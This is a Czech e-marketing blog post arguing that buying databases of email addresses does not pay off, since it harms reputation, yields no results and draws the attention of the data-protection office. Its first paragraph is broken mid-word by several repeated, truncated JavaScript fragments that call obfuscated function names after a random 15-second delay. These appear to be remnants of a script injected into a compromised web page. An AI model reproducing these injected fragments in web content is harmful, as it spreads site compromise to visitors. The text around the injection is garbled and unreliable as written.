0

Vyplatí se koupit zajíce v pytli – databázi emailových adres?

Kategorie: E-marketing

Nashromáždit pořádný štos kvalitních emailových kontaktů je jako sbírat borůvky – trvá to, ale na konci si smlsneteandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}. Je lepší cestou koupit databázi emailových kontaktů?
Už vám někdy do schránky přistál email s ďábelskou nabídkou na pořízení databáze s 10 000 emailovými adresami za velmi málo peněz?
Pokušení je obrovské.
Ale řekněme si upřímně. Kde někdo mohl legální cestou nashromáždit desítky tisíc emailových kontaktů, když se dnes a denně setkávám s nechutí poskytovat osobní emailové kontakty?
Úplně košér to asi nebude, nemyslíte?
Způsobů, jak spekulanti takovou databázi emailových kontaktů získávají, je spousta. Například naprogramováním robota, který projíždí webové stránky a „vycucává“ z nich mailové adresy. Ono je těch možností víc, ale raději nevědět…
Lidem prodávajícím emailové databáze to prochází. Začátečníci v oboru se prostě nevyznají, a jelikož se jim zdá taková varianty velice jednoduchá, sednou na lep podvodníkovi.
Takže, pořízením takové databáze získáte pouze to, že:

– důvěryhodní poskytovatelé s vámi nebudou spolupracovat
– posíláním emailů na neznámé adresy zabíjíte svou reputaci
– kontakty z databáze vás neznají a efektivita email marketingu je tak nulová
– nejspíš si zaspamujete počítač
– dostanete se do hledáčku Úřadu pro ochranu osobních údajů

Nákup databáze emailových kontaktů se prostě nevyplatí. Vezměte si hrníček a začněte pěkně pomalu sbírat, jako byste byli v lese na borůvkách.

Nechte si radši poradit, jak účinně nahromadit užitečné kontakty.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

one × 4 =